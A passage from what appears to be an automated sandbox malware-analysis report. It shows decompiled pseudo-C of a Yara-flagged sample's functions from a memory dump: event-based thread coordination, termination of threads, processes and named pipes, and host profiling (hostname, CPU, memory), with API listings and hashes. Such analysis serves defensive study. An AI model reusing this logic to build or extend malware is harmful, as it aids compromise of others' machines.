                                                                                    • ReadProcessMemory.KERNEL32(00000000,?,00000000,?,00000000), ref: 04EB61EE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process$AddressLibraryLoadMemoryProcRead$CurrentHandleModuleOpen
                                                                                    • String ID: IsWow64Process$NtQueryInformationProcess$kernel32.dll$ntdll.dll
                                                                                    • API String ID: 4184825023-3205649337
                                                                                    • Opcode ID: 092f690cc49404bf09f93677515c24cd0f1295c6780559b15cc940085dbbd47e
                                                                                    • Instruction ID: 1e02d4d0d8bcb7ec352a7cd1e297ef6fb68dfc494651bbdad29d27bbea4cdc76
                                                                                    • Opcode Fuzzy Hash: 092f690cc49404bf09f93677515c24cd0f1295c6780559b15cc940085dbbd47e
                                                                                    • Instruction Fuzzy Hash: 2651B471B01219ABEB249FB5DC45BFFBB78FF44305F001159E90AA6280DB78B945CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC9DC0, Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 164synchronizationthreadsleepCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E04EC9DC0(void* __eflags) {
				long _v8;
				void* _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t17;
				long _t20;
				void* _t21;
				long _t26;
				int _t36;
				long _t37;
				void* _t43;
				void* _t44;
				void* _t59;
				void* _t62;
				void* _t65;
				void* _t68;

				_v12 = 0;
				_v16 = 0;
				E04EC9360(_t44,  &_v20, _t59, _t64, __eflags, L"Dispatch");
				_t60 = CloseHandle;
				if(_v20 != 0) {
					L12:
					_t65 = 0;
					__eflags = 0;
					L13:
					_t17 = _v12;
					__eflags = _t17;
					if(_t17 != 0) {
						CloseHandle(_t17);
					}
					return _t65;
				}
				_t71 = _v16;
				_t45 = WaitForSingleObject;
				if(_v16 == 0) {
					while(1) {
						L17:
						_t20 = E04EC94A0(_t45, L"Control", _t60, _t64, _t79);
						_t80 = _t20;
						if(_t20 == 0) {
						}
						L18:
						_t48 =  &_v8;
						_v8 = 0;
						_t61 = E04EC95F0(_t45,  &_v8, _t60, _t64, _t80);
						if(_t23 == 0) {
							L16:
							_t60 = CloseHandle;
							while(1) {
								L17:
								_t20 = E04EC94A0(_t45, L"Control", _t60, _t64, _t79);
								_t80 = _t20;
								if(_t20 == 0) {
								}
								goto L18;
							}
						}
						_t56 = _v8;
						if(_v8 == 0) {
							goto L16;
						}
						_t64 = E04EC98E0(_t45, _t61, _t56, _t48);
						E04ED573F(_t61);
						_t60 = CloseHandle;
						_t68 = _t68 + 8;
						if(_t64 != 0) {
							_t26 = WaitForSingleObject(_t64, 0xbb8);
							_t79 = _t26 - 0x102;
							if(_t26 == 0x102) {
								CloseHandle(_t64);
							}
						}
						while(1) {
							L17:
							_t20 = E04EC94A0(_t45, L"Control", _t60, _t64, _t79);
							_t80 = _t20;
							if(_t20 == 0) {
							}
							goto L23;
						}
						goto L18;
						L23:
						__eflags = _t20 - 0x1fffffff;
						if(_t20 == 0x1fffffff) {
							do {
								_t21 = SetConsoleCtrlHandler(E04ECA880, 0);
								__eflags = _t21;
							} while (_t21 != 0);
							_t65 = 0x315;
							goto L13;
						}
						__eflags = _t20 - 0x2fffffff;
						if(__eflags != 0) {
							_t64 = OpenThread(0x1fffff, 0, _t20);
							__eflags = _t64;
							if(__eflags == 0) {
								goto L18;
							}
							WaitForSingleObject(_t64, 0xffffffff);
							CloseHandle(_t64);
							continue;
						}
						Sleep(0x7d0);
						_t50 =  &_v8;
						_v8 = 0;
						_t64 = E04EC95F0(_t45,  &_v8, _t60, _t64, __eflags);
						__eflags = _t30;
						if(__eflags == 0) {
							continue;
						}
						_t57 = _v8;
						__eflags = _v8;
						if(__eflags == 0) {
							continue;
						}
						_t62 = E04EC98E0(_t45, _t64, _t57, _t50);
						E04ED573F(_t64);
						_t68 = _t68 + 8;
						__eflags = _t62;
						if(__eflags == 0) {
							goto L16;
						}
						__eflags = WaitForSingleObject(_t62, 0xbb8) - 0x102;
						if(__eflags != 0) {
							goto L16;
						}
						CloseHandle(_t62);
						E04EB78A0(_t45, L"Dispatch", 0x2fffffff, CloseHandle, _t64, __eflags);
						do {
							_t36 = SetConsoleCtrlHandler(E04ECA880, 0);
							__eflags = _t36;
						} while (_t36 != 0);
						_t65 = 0x315;
						goto L13;
					}
				}
				_t37 = E04EC94A0(WaitForSingleObject, L"Dispatch", CloseHandle, _t64, _t71);
				if(_t37 == 0) {
					goto L17;
				}
				while(_t37 != 0x2fffffff && _t37 != 0x1fffffff) {
					_t64 = OpenThread(0x1fffff, 0, _t37);
					if(_t64 == 0) {
						goto L17;
					}
					WaitForSingleObject(_t64, 0xffffffff);
					if(GetExitCodeThread(_t64,  &_v8) == 0) {
						L8:
						_t43 = E04EC9360(_t45,  &_v20, _t60, _t64, _t77, L"Dispatch");
						_t78 = _t43;
						if(_t43 != 0) {
							goto L17;
						}
						_t37 = E04EC94A0(_t45, L"Dispatch", _t60, _t64, _t78);
						_t79 = _t37;
						if(_t37 != 0) {
							continue;
						} else {
							goto L17;
						}
					}
					_t77 = _v8 - 0x315;
					if(_v8 == 0x315) {
						goto L12;
					}
					goto L8;
				}
				E04ECA860();
				goto L12;
			}






















                                                                                    0x04ec9dd1
                                                                                    0x04ec9dd8
                                                                                    0x04ec9ddf
                                                                                    0x04ec9de8
                                                                                    0x04ec9dee
                                                                                    0x04ec9e7b
                                                                                    0x04ec9e7b
                                                                                    0x04ec9e7b
                                                                                    0x04ec9e7d
                                                                                    0x04ec9e7d
                                                                                    0x04ec9e80
                                                                                    0x04ec9e82
                                                                                    0x04ec9e85
                                                                                    0x04ec9e85
                                                                                    0x04ec9e8f
                                                                                    0x04ec9e8f
                                                                                    0x04ec9df4
                                                                                    0x04ec9df8
                                                                                    0x04ec9dfe
                                                                                    0x04ec9ea0
                                                                                    0x04ec9ea0
                                                                                    0x04ec9ea5
                                                                                    0x04ec9eaa
                                                                                    0x04ec9eac
                                                                                    0x04ec9eac
                                                                                    0x04ec9eae
                                                                                    0x04ec9eae
                                                                                    0x04ec9eb1
                                                                                    0x04ec9ebd
                                                                                    0x04ec9ec1
                                                                                    0x04ec9e92
                                                                                    0x04ec9e92
                                                                                    0x04ec9ea0
                                                                                    0x04ec9ea0
                                                                                    0x04ec9ea5
                                                                                    0x04ec9eaa
                                                                                    0x04ec9eac
                                                                                    0x04ec9eac
                                                                                    0x00000000
                                                                                    0x04ec9eac
                                                                                    0x04ec9ea0
                                                                                    0x04ec9ec3
                                                                                    0x04ec9ec8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec9ed3
                                                                                    0x04ec9ed5
                                                                                    0x04ec9eda
                                                                                    0x04ec9ee0
                                                                                    0x04ec9ee5
                                                                                    0x04ec9eed
                                                                                    0x04ec9eef
                                                                                    0x04ec9ef4
                                                                                    0x04ec9ef7
                                                                                    0x04ec9ef7
                                                                                    0x04ec9ef4
                                                                                    0x04ec9ea0
                                                                                    0x04ec9ea0
                                                                                    0x04ec9ea5
                                                                                    0x04ec9eaa
                                                                                    0x04ec9eac
                                                                                    0x04ec9eac
                                                                                    0x00000000
                                                                                    0x04ec9eac
                                                                                    0x00000000
                                                                                    0x04ec9efb
                                                                                    0x04ec9efb
                                                                                    0x04ec9f00
                                                                                    0x04ec9fd2
                                                                                    0x04ec9fd9
                                                                                    0x04ec9fdb
                                                                                    0x04ec9fdb
                                                                                    0x04ec9fdf
                                                                                    0x00000000
                                                                                    0x04ec9fdf
                                                                                    0x04ec9f06
                                                                                    0x04ec9f0b
                                                                                    0x04ec9fb5
                                                                                    0x04ec9fb7
                                                                                    0x04ec9fb9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec9fc2
                                                                                    0x04ec9fc5
                                                                                    0x00000000
                                                                                    0x04ec9fc5
                                                                                    0x04ec9f16
                                                                                    0x04ec9f1c
                                                                                    0x04ec9f1f
                                                                                    0x04ec9f2b
                                                                                    0x04ec9f2d
                                                                                    0x04ec9f2f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec9f35
                                                                                    0x04ec9f38
                                                                                    0x04ec9f3a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec9f49
                                                                                    0x04ec9f4b
                                                                                    0x04ec9f50
                                                                                    0x04ec9f53
                                                                                    0x04ec9f55
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec9f63
                                                                                    0x04ec9f68
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec9f75
                                                                                    0x04ec9f81
                                                                                    0x04ec9f90
                                                                                    0x04ec9f97
                                                                                    0x04ec9f99
                                                                                    0x04ec9f99
                                                                                    0x04ec9f9d
                                                                                    0x00000000
                                                                                    0x04ec9f9d
                                                                                    0x04ec9ea0
                                                                                    0x04ec9e09
                                                                                    0x04ec9e10
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec9e16
                                                                                    0x04ec9e32
                                                                                    0x04ec9e36
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec9e3b
                                                                                    0x04ec9e4a
                                                                                    0x04ec9e55
                                                                                    0x04ec9e5d
                                                                                    0x04ec9e62
                                                                                    0x04ec9e64
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec9e6b
                                                                                    0x04ec9e70
                                                                                    0x04ec9e72
                                                                                    0x00000000
                                                                                    0x04ec9e74
                                                                                    0x00000000
                                                                                    0x04ec9e74
                                                                                    0x04ec9e72
                                                                                    0x04ec9e4c
                                                                                    0x04ec9e53
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec9e53
                                                                                    0x04ec9e76
                                                                                    0x00000000

                                                                                    APIs
                                                                                      • Part of subcall function 04EC9360: wsprintfW.USER32 ref: 04EC939E
                                                                                      • Part of subcall function 04EC9360: CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 04EC93B0
                                                                                      • Part of subcall function 04EC9360: GetLastError.KERNEL32 ref: 04EC93C1
                                                                                      • Part of subcall function 04EC9360: CloseHandle.KERNEL32(?), ref: 04EC93D1
                                                                                    • OpenThread.KERNEL32(001FFFFF,00000000,00000000,Dispatch,00000000,00000001,74E5F750), ref: 04EC9E2C
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 04EC9E3B
                                                                                    • GetExitCodeThread.KERNEL32(00000000,?), ref: 04EC9E42
                                                                                    • CloseHandle.KERNEL32(00000000,Dispatch), ref: 04EC9E85
                                                                                    • WaitForSingleObject.KERNEL32(00000000,00000BB8,00000001,74E5F750), ref: 04EC9EED
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04EC9EF7
                                                                                    • Sleep.KERNEL32(000007D0,Dispatch), ref: 04EC9F16
                                                                                    • WaitForSingleObject.KERNEL32(00000000,00000BB8), ref: 04EC9F61
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04EC9F75
                                                                                    • SetConsoleCtrlHandler.KERNEL32(04ECA880,00000000), ref: 04EC9F97
                                                                                    • OpenThread.KERNEL32(001FFFFF,00000000,00000000,Dispatch), ref: 04EC9FAF
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 04EC9FC2
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04EC9FC5
                                                                                    • SetConsoleCtrlHandler.KERNEL32(04ECA880,00000000,Dispatch), ref: 04EC9FD9
                                                                                      • Part of subcall function 04EC94A0: wsprintfW.USER32 ref: 04EC94E0
                                                                                      • Part of subcall function 04EC94A0: RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020119,?), ref: 04EC951D
                                                                                      • Part of subcall function 04EC94A0: RegQueryValueExW.ADVAPI32(?,04EFD09C,00000000,?,00000000,?), ref: 04EC954C
                                                                                      • Part of subcall function 04EC94A0: RegCloseKey.ADVAPI32(?), ref: 04EC9562
                                                                                      • Part of subcall function 04EC94A0: wsprintfW.USER32 ref: 04EC959B
                                                                                      • Part of subcall function 04EC94A0: OpenEventW.KERNEL32(001F0003,00000000,?), ref: 04EC95B2
                                                                                      • Part of subcall function 04EC94A0: CloseHandle.KERNEL32(00000000), ref: 04EC95BD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close$Handle$ObjectOpenSingleWait$Threadwsprintf$ConsoleCtrlEventHandler$CodeCreateErrorExitLastQuerySleepValue
                                                                                    • String ID: Control$Dispatch
                                                                                    • API String ID: 483187212-3312308793
                                                                                    • Opcode ID: 8e137a60a0533a42ac60d86059029a447ede7aff774ea0b0c398d9cd9f45ae2e
                                                                                    • Instruction ID: 1b59af71d1ca151342ade6e735b25b7723ba85b3bd8c183ec144d51832735936
                                                                                    • Opcode Fuzzy Hash: 8e137a60a0533a42ac60d86059029a447ede7aff774ea0b0c398d9cd9f45ae2e
                                                                                    • Instruction Fuzzy Hash: 83513BB1A00214EFEB2067658E44BBF72A59F9172DF15221CD814A72D2EF74FD0386A1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC3E50, Relevance: 27.1, APIs: 18, Instructions: 65pipethreadsynchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E04EC3E50(intOrPtr* __ecx) {
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;
				int _t36;
				intOrPtr* _t42;

				_t42 = __ecx;
				 *__ecx = 0x4efdda4;
				TerminateThread( *(__ecx + 0x24), 0);
				TerminateProcess( *(_t42 + 0x1c), 0);
				TerminateThread( *(_t42 + 0x20), 0);
				WaitForSingleObject( *(_t42 + 0x28), 0x7d0);
				TerminateThread( *(_t42 + 0x28), 0);
				_t24 =  *(_t42 + 0xc);
				if(_t24 != 0) {
					DisconnectNamedPipe(_t24);
				}
				_t25 =  *(_t42 + 0x10);
				if(_t25 != 0) {
					DisconnectNamedPipe(_t25);
				}
				_t26 =  *(_t42 + 0x14);
				if(_t26 != 0) {
					DisconnectNamedPipe(_t26);
				}
				_t27 =  *(_t42 + 0x18);
				if(_t27 != 0) {
					DisconnectNamedPipe(_t27);
				}
				CloseHandle( *(_t42 + 0xc));
				CloseHandle( *(_t42 + 0x10));
				CloseHandle( *(_t42 + 0x14));
				CloseHandle( *(_t42 + 0x18));
				CloseHandle( *(_t42 + 0x1c));
				CloseHandle( *(_t42 + 0x20));
				CloseHandle( *(_t42 + 0x28));
				CloseHandle( *(_t42 + 0x24));
				 *_t42 = 0x4efd8b0;
				_t36 = CloseHandle( *(_t42 + 8));
				 *_t42 = 0x4efd8c0;
				return _t36;
			}









                                                                                    0x04ec3e58
                                                                                    0x04ec3e5f
                                                                                    0x04ec3e65
                                                                                    0x04ec3e6c
                                                                                    0x04ec3e77
                                                                                    0x04ec3e81
                                                                                    0x04ec3e8c
                                                                                    0x04ec3e8e
                                                                                    0x04ec3e99
                                                                                    0x04ec3e9c
                                                                                    0x04ec3e9c
                                                                                    0x04ec3e9e
                                                                                    0x04ec3ea3
                                                                                    0x04ec3ea6
                                                                                    0x04ec3ea6
                                                                                    0x04ec3ea8
                                                                                    0x04ec3ead
                                                                                    0x04ec3eb0
                                                                                    0x04ec3eb0
                                                                                    0x04ec3eb2
                                                                                    0x04ec3eb7
                                                                                    0x04ec3eba
                                                                                    0x04ec3eba
                                                                                    0x04ec3ec5
                                                                                    0x04ec3eca
                                                                                    0x04ec3ecf
                                                                                    0x04ec3ed4
                                                                                    0x04ec3ed9
                                                                                    0x04ec3ede
                                                                                    0x04ec3ee3
                                                                                    0x04ec3ee8
                                                                                    0x04ec3eed
                                                                                    0x04ec3ef3
                                                                                    0x04ec3ef5
                                                                                    0x04ec3efd

                                                                                    APIs
                                                                                    • TerminateThread.KERNEL32(?,00000000,?,00000000,04EB90F8,?,Function_000568D8,00000000), ref: 04EC3E65
                                                                                    • TerminateProcess.KERNEL32(?,00000000,?,00000000,04EB90F8,?,Function_000568D8,00000000), ref: 04EC3E6C
                                                                                    • TerminateThread.KERNEL32(?,00000000,?,00000000,04EB90F8,?,Function_000568D8,00000000), ref: 04EC3E77
                                                                                    • WaitForSingleObject.KERNEL32(?,000007D0,?,00000000,04EB90F8,?,Function_000568D8,00000000), ref: 04EC3E81
                                                                                    • TerminateThread.KERNEL32(?,00000000,?,00000000,04EB90F8,?,Function_000568D8,00000000), ref: 04EC3E8C
                                                                                    • DisconnectNamedPipe.KERNEL32(?,?,00000000,04EB90F8,?,Function_000568D8,00000000), ref: 04EC3E9C
                                                                                    • DisconnectNamedPipe.KERNEL32(?,?,00000000,04EB90F8,?,Function_000568D8,00000000), ref: 04EC3EA6
                                                                                    • DisconnectNamedPipe.KERNEL32(?,?,00000000,04EB90F8,?,Function_000568D8,00000000), ref: 04EC3EB0
                                                                                    • DisconnectNamedPipe.KERNEL32(?,?,00000000,04EB90F8,?,Function_000568D8,00000000), ref: 04EC3EBA
                                                                                    • CloseHandle.KERNEL32(?,?,00000000,04EB90F8,?,Function_000568D8,00000000), ref: 04EC3EC5
                                                                                    • CloseHandle.KERNEL32(?,?,00000000,04EB90F8,?,Function_000568D8,00000000), ref: 04EC3ECA
                                                                                    • CloseHandle.KERNEL32(?,?,00000000,04EB90F8,?,Function_000568D8,00000000), ref: 04EC3ECF
                                                                                    • CloseHandle.KERNEL32(?,?,00000000,04EB90F8,?,Function_000568D8,00000000), ref: 04EC3ED4
                                                                                    • CloseHandle.KERNEL32(?,?,00000000,04EB90F8,?,Function_000568D8,00000000), ref: 04EC3ED9
                                                                                    • CloseHandle.KERNEL32(?,?,00000000,04EB90F8,?,Function_000568D8,00000000), ref: 04EC3EDE
                                                                                    • CloseHandle.KERNEL32(?,?,00000000,04EB90F8,?,Function_000568D8,00000000), ref: 04EC3EE3
                                                                                    • CloseHandle.KERNEL32(?,?,00000000,04EB90F8,?,Function_000568D8,00000000), ref: 04EC3EE8
                                                                                    • CloseHandle.KERNEL32(?,?,00000000,04EB90F8,?,Function_000568D8,00000000), ref: 04EC3EF3
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$DisconnectNamedPipeTerminate$Thread$ObjectProcessSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 1450516946-0
                                                                                    • Opcode ID: 3bd433265262b524225fd77d7ab0d66ee93e59dc2d9488758f905605a436c22a
                                                                                    • Instruction ID: d02b9531d425e5363f4d25ef64965c06c3cd45f70ef9ee4f422c8f503f353f4b
                                                                                    • Opcode Fuzzy Hash: 3bd433265262b524225fd77d7ab0d66ee93e59dc2d9488758f905605a436c22a
                                                                                    • Instruction Fuzzy Hash: FE11EC31A0062ABFDB216F26DC09F06BFB9FF48761B144216A90892960DB71F871DFD0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ECAD50, Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 228registrynetworkCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 69%
                                                                                    			E04ECAD50(void* __ebx, int __ecx, union %anon243 __edx, void* __edi, void* __esi, signed short* _a4, signed short* _a8, signed short* _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v40;
				void _v428;
				short _v628;
				void* _v668;
				struct _MEMORYSTATUSEX _v740;
				struct _SYSTEM_INFO _v776;
				char _v788;
				int _v792;
				int _v796;
				intOrPtr _v800;
				void* _v804;
				char _v808;
				signed int _t77;
				signed int _t79;
				intOrPtr _t81;
				signed int _t89;
				signed int _t93;
				char* _t95;
				intOrPtr _t99;
				signed int _t116;
				signed int _t117;
				signed int _t118;
				signed int _t119;
				void* _t129;
				void* _t130;
				int _t131;
				signed int _t133;
				signed int _t141;
				signed short* _t146;
				signed short* _t148;
				signed int _t156;
				void* _t160;
				signed int _t162;
				signed int _t164;
				signed short* _t165;
				intOrPtr* _t179;
				void* _t181;
				void* _t182;
				signed int _t184;
				signed int _t188;
				signed int _t190;
				void* _t191;
				void* _t193;

				_t167 = __edi;
				_t136 = __ecx;
				_t190 = (_t188 & 0xfffffff8) - 0x31c;
				_t77 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t77 ^ _t190;
				_t79 =  *0x4f068d0; // 0x0
				_v776.dwOemId = __edx;
				_v792 = __ecx;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t195 = _t79;
				if(_t79 == 0) {
					_t131 = E04ED5744(__esi, _t195, 0x3c);
					_t190 = _t190 + 4;
					_t136 = _t131;
					_t79 = E04EB62B0(__ebx, _t131, __edi, _t195);
					 *0x4f068d0 = _t79;
				}
				_t179 =  *_t79;
				if(_t179 != 0) {
					_t81 =  *_t179 + 0x378;
					_push(_t81);
					_v776.dwPageSize = _t81;
					_t133 = E04ED5785(_t136, _t179, __eflags);
					_t190 = _t190 + 4;
					__eflags = _t133;
					if(_t133 == 0) {
						goto L3;
					} else {
						_t6 = _t133 + 0x350; // 0x350
						E04EDDC90(_t6, _t179,  *_t179 + 0x28);
						_t89 =  *0x4f068d0; // 0x0
						_t191 = _t190 + 0xc;
						__eflags = _t89;
						if(__eflags == 0) {
							_t130 = E04ED5744(_t179, __eflags, 0x3c);
							_t191 = _t191 + 4;
							_t89 = E04EB62B0(_t133, _t130, _t167, __eflags);
							 *0x4f068d0 = _t89;
						}
						asm("movups xmm0, [eax+0x4]");
						asm("movups [ebx+0x8], xmm0");
						asm("movups xmm0, [eax+0x14]");
						asm("movups [ebx+0x18], xmm0");
						 *((char*)(_t133 + 0x28)) =  *((intOrPtr*)(_t89 + 0x24));
						 *_t133 = 0x99;
						 *((intOrPtr*)(_t133 + 0x348)) = GetTickCount();
						 *((intOrPtr*)(_t133 + 0x34c)) = GetCurrentProcessId();
						_t93 =  *0x4f068d0; // 0x0
						__eflags = _t93;
						if(__eflags == 0) {
							_t129 = E04ED5744(_t179, __eflags, 0x3c);
							_t191 = _t191 + 4;
							_t93 = E04EB62B0(_t133, _t129, _t167, __eflags);
							 *0x4f068d0 = _t93;
						}
						_t181 =  *(_t93 + 0x28);
						_t12 = _t133 + 0x2c; // 0x2c
						_t95 = memcpy(_t12, _t181, 0x48 << 2);
						_t171 = _t181 + 0x90;
						gethostname(_t95, 0x100);
						asm("movups xmm0, [esp+0x90]");
						_t15 = _t133 + 0x2e8; // 0x2e8
						_t182 = _t15;
						asm("movups [ebx+0x158], xmm0");
						asm("movups xmm0, [esp+0xa8]");
						asm("movups [ebx+0x168], xmm0");
						asm("movups xmm0, [esp+0xbc]");
						asm("movups [ebx+0x178], xmm0");
						 *((short*)(_t133 + 0x188)) = _v628;
						E04EDDAD0(_t181 + 0x90, _t182, 0, 0x5e);
						_t99 = _v800;
						_t19 = _t133 + 0x346; // 0x346
						_t160 = _t19;
						_t193 = _t191 + 0x18;
						_v808 = 0x2f;
						_t141 =  *(_t99 + 0x5c) & 0x0000ffff;
						__eflags = _t141 - 1;
						if(_t141 != 1) {
							__eflags = _t141 - 2;
							if(_t141 == 2) {
								_t156 =  *((intOrPtr*)(_t99 + 0x24)) + 4;
								__eflags = _t156;
								goto L13;
							}
						} else {
							_t156 =  *(_t99 + 0x20);
							L13:
							 *((intOrPtr*)( *_t156 + 0x34))(_t182,  &_v808, _t160);
						}
						GetSystemInfo( &_v776);
						 *((short*)(_t133 + 0x14c)) = _v776.dwNumberOfProcessors;
						_v796 = 4;
						_v792 = 4;
						RegOpenKeyW(0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0",  &_v804);
						RegQueryValueExW(_v804, L"~MHz", 0,  &_v792,  &_v788,  &_v796);
						RegCloseKey(_v804);
						 *(_t133 + 0x150) = _v788;
						_v740.dwLength = 0x40;
						GlobalMemoryStatusEx( &_v740);
						 *(_t133 + 0x154) = (_v740.ullTotalPhys << 0x00000020 | _v740.dwMemoryLoad) >> 0x14;
						__imp__CoInitialize(0);
						 *((intOrPtr*)(_t133 + 0x2e4)) = E04EB2DB0(_t133, 0, _t171, _t182);
						__imp__CoUninitialize();
						 *((intOrPtr*)(_t133 + 0x18c)) = _v792;
						__eflags = E04ECAB10(_t133,  &_v428, _t171, _t182, __eflags);
						if(__eflags == 0) {
							_t146 = _a4;
							_t56 = _t133 + 0x190; // 0x190
							_t162 = _t56 - _t146;
							__eflags = _t162;
							do {
								_t116 =  *_t146 & 0x0000ffff;
								_t146 =  &(_t146[1]);
								 *(_t162 + _t146 - 2) = _t116;
								__eflags = _t116;
							} while (__eflags != 0);
						} else {
							_t52 = _t133 + 0x190; // 0x190
							_t182 =  &_v428;
							memcpy(_t52, _t182, 0x19 << 2);
							_t193 = _t193 + 0xc;
							_t171 = _t182 + 0x32;
						}
						_t117 = E04ECAC30(_t133,  &_v428, _t171, _t182, __eflags);
						__eflags = _t117;
						if(_t117 == 0) {
							_t148 = _a8;
							_t65 = _t133 + 0x1f4; // 0x1f4
							_t164 = _t65 - _t148;
							__eflags = _t164;
							do {
								_t118 =  *_t148 & 0x0000ffff;
								 *(_t148 + _t164) = _t118;
								_t148 =  &(_t148[1]);
								__eflags = _t118;
							} while (_t118 != 0);
						} else {
							_t61 = _t133 + 0x1f4; // 0x1f4
							memcpy(_t61,  &_v428, 0x32 << 2);
							_t193 = _t193 + 0xc;
							_t148 = 0;
						}
						_t165 = _a12;
						_t68 = _t133 + 0x2bc; // 0x2bc
						_t184 = _t68 - _t165;
						__eflags = _t184;
						do {
							_t119 =  *_t165 & 0x0000ffff;
							_t69 =  &(_t165[1]); // 0x0
							_t165 = _t69;
							 *(_t184 + _t165 - 2) = _t119;
							__eflags = _t119;
						} while (_t119 != 0);
						_push(_t148);
						_push(0x3f);
						_push(_v788);
						 *((intOrPtr*)(_t133 + 4)) = _a16;
						E04EB1C60(_v808);
						E04ED573F(_t133);
						__eflags = _v40 ^ _t193 + 0x00000004;
						return E04ED572E(_v40 ^ _t193 + 0x00000004, _t133);
					}
				} else {
					L3:
					return E04ED572E(_v8 ^ _t190);
				}
			}















































                                                                                    0x04ecad50
                                                                                    0x04ecad50
                                                                                    0x04ecad56
                                                                                    0x04ecad5c
                                                                                    0x04ecad63
                                                                                    0x04ecad6a
                                                                                    0x04ecad6f
                                                                                    0x04ecad73
                                                                                    0x04ecad77
                                                                                    0x04ecad78
                                                                                    0x04ecad79
                                                                                    0x04ecad7a
                                                                                    0x04ecad7c
                                                                                    0x04ecad80
                                                                                    0x04ecad85
                                                                                    0x04ecad88
                                                                                    0x04ecad8a
                                                                                    0x04ecad8f
                                                                                    0x04ecad8f
                                                                                    0x04ecad94
                                                                                    0x04ecad98
                                                                                    0x04ecadb3
                                                                                    0x04ecadb8
                                                                                    0x04ecadb9
                                                                                    0x04ecadc2
                                                                                    0x04ecadc4
                                                                                    0x04ecadc7
                                                                                    0x04ecadc9
                                                                                    0x00000000
                                                                                    0x04ecadcb
                                                                                    0x04ecadd1
                                                                                    0x04ecadd9
                                                                                    0x04ecadde
                                                                                    0x04ecade3
                                                                                    0x04ecade6
                                                                                    0x04ecade8
                                                                                    0x04ecadec
                                                                                    0x04ecadf1
                                                                                    0x04ecadf6
                                                                                    0x04ecadfb
                                                                                    0x04ecadfb
                                                                                    0x04ecae00
                                                                                    0x04ecae04
                                                                                    0x04ecae08
                                                                                    0x04ecae0c
                                                                                    0x04ecae13
                                                                                    0x04ecae16
                                                                                    0x04ecae1f
                                                                                    0x04ecae2b
                                                                                    0x04ecae31
                                                                                    0x04ecae36
                                                                                    0x04ecae38
                                                                                    0x04ecae3c
                                                                                    0x04ecae41
                                                                                    0x04ecae46
                                                                                    0x04ecae4b
                                                                                    0x04ecae4b
                                                                                    0x04ecae50
                                                                                    0x04ecae53
                                                                                    0x04ecae67
                                                                                    0x04ecae67
                                                                                    0x04ecae6a
                                                                                    0x04ecae70
                                                                                    0x04ecae7a
                                                                                    0x04ecae7a
                                                                                    0x04ecae80
                                                                                    0x04ecae89
                                                                                    0x04ecae92
                                                                                    0x04ecae99
                                                                                    0x04ecaea1
                                                                                    0x04ecaeb0
                                                                                    0x04ecaeb7
                                                                                    0x04ecaebc
                                                                                    0x04ecaec0
                                                                                    0x04ecaec0
                                                                                    0x04ecaec6
                                                                                    0x04ecaec9
                                                                                    0x04ecaed1
                                                                                    0x04ecaed5
                                                                                    0x04ecaed8
                                                                                    0x04ecaedf
                                                                                    0x04ecaee2
                                                                                    0x04ecaee7
                                                                                    0x04ecaee7
                                                                                    0x00000000
                                                                                    0x04ecaee7
                                                                                    0x04ecaeda
                                                                                    0x04ecaeda
                                                                                    0x04ecaeea
                                                                                    0x04ecaef3
                                                                                    0x04ecaef3
                                                                                    0x04ecaefb
                                                                                    0x04ecaf06
                                                                                    0x04ecaf1c
                                                                                    0x04ecaf24
                                                                                    0x04ecaf2c
                                                                                    0x04ecaf4c
                                                                                    0x04ecaf56
                                                                                    0x04ecaf60
                                                                                    0x04ecaf6b
                                                                                    0x04ecaf73
                                                                                    0x04ecaf8a
                                                                                    0x04ecaf90
                                                                                    0x04ecaf9d
                                                                                    0x04ecafa3
                                                                                    0x04ecafb4
                                                                                    0x04ecafbf
                                                                                    0x04ecafc1
                                                                                    0x04ecafd9
                                                                                    0x04ecafdc
                                                                                    0x04ecafe2
                                                                                    0x04ecafe2
